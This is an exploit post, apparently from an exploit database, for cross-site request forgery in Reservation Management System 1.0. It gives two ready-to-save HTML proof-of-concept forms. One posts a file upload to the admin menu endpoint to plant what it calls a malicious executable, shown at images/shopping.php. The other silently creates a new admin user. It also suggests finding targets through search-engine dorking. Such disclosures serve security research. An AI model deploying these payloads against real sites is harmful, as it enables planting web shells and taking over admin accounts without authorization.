Reservation Management System 1.0 Cross Site Request Forgery
=============================================================================================================================================
| # Title : Reservation Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine. [+] The following html code uploads a executable malicious file remotely . [+] Line 8 : Set your target url [+] save payload as poc.html [+] payload :<div class=”modal-content”>
<div class=”modal-header”>
<button type=”button” class=”close” data-dismiss=”modal” aria-hidden=”true”>×</button>
<h4 class=”modal-title”>Add New Menu</h4>
</div>
<div class=”modal-body”>
<!–start form–>
<form class=”form-horizontal” method=”post” action=”http://127.0.0.1/reservation/admin/menu_save.php” enctype=”multipart/form-data”>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Menu Name</label>
<div class=”col-lg-8″>
<input type=”text” class=”form-control” name=”menu” id=”title” placeholder=”Menu Name” required=””>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Category</label>
<div class=”col-lg-8″>
<select class=”form-control select2″ id=”exampleSelect1″ name=”cat” required=””>
<option value=”9″>Dessert</option>
<option value=”6″>Main Course</option>
<option value=”7″>Pasta</option>
<option value=”10″>Rice</option>
</select>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Subcategory</label>
<div class=”col-lg-8″>
<select class=”form-control select2″ id=”exampleSelect1″ name=”subcat”>
<option>Drinks</option>
<option>Lunch and Dinner</option>
<option>Mirienda</option>
<option>Non Combo Meal</option>
</select>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Description</label>
<div class=”col-lg-8″>
<textarea class=”form-control” name=”desc” id=”title” placeholder=”Description” required=””></textarea>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Price</label>
<div class=”col-lg-8″>
<input type=”text” class=”form-control” name=”price” id=”title” placeholder=”Price” required=””>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Image</label>
<div class=”col-lg-8″>
<input type=”file” class=”form-control” name=”image” id=”title”>
</div>
</div>
<!– Buttons –>
<div class=”form-group”>
<!– Buttons –>
<div class=”col-lg-offset-2 col-lg-6″>
<button type=”submit” class=”btn btn-sm btn-primary”>Save</button>
<button type=”button” class=”btn btn-default” data-dismiss=”modal” aria-hidden=”true”>Close</button>
</div>
</div>
</form>
<!–end form–>
</div>
</div>
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php———–[+] Part 02 Add Admin [+]——————-
[+] Line 8 : Set your target url [+] save payload as poc.html [+] payload :<div class=”modal-content”>
<div class=”modal-header”>
<button type=”button” class=”close” data-dismiss=”modal” aria-hidden=”true”>×</button>
<h4 class=”modal-title”>Add New User</h4>
</div>
<div class=”modal-body”>
<!–start form–>
<form class=”form-horizontal” method=”post” action=”http://127.0.0.1/reservation/admin/user_save.php”>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”title”>Full Name</label>
<div class=”col-lg-8″>
<input type=”text” class=”form-control” name=”name” id=”title” placeholder=”Write Full Name of User” required=””>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”username”>Username</label>
<div class=”col-lg-8″>
<input type=”text” class=”form-control” name=”username” value=”chimney_admin” placeholder=”Write Username” required=””>
</div>
</div>
<!– Title –>
<div class=”form-group”>
<label class=”control-label col-lg-2″ for=”password”>Password</label>
<div class=”col-lg-8″>
<input type=”password” class=”form-control” name=”password” id=”password” placeholder=”Write password” required=””>
</div>
</div>
<!– Buttons –>
<div class=”form-group”>
<!– Buttons –>
<div class=”col-lg-offset-2 col-lg-6″>
<button type=”submit” class=”btn btn-sm btn-primary”>Save</button>
<button type=”button” class=”btn btn-default” data-dismiss=”modal” aria-hidden=”true”>Close</button>
</div>
</div>
</form>
<!–end form–>
</div>
</div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================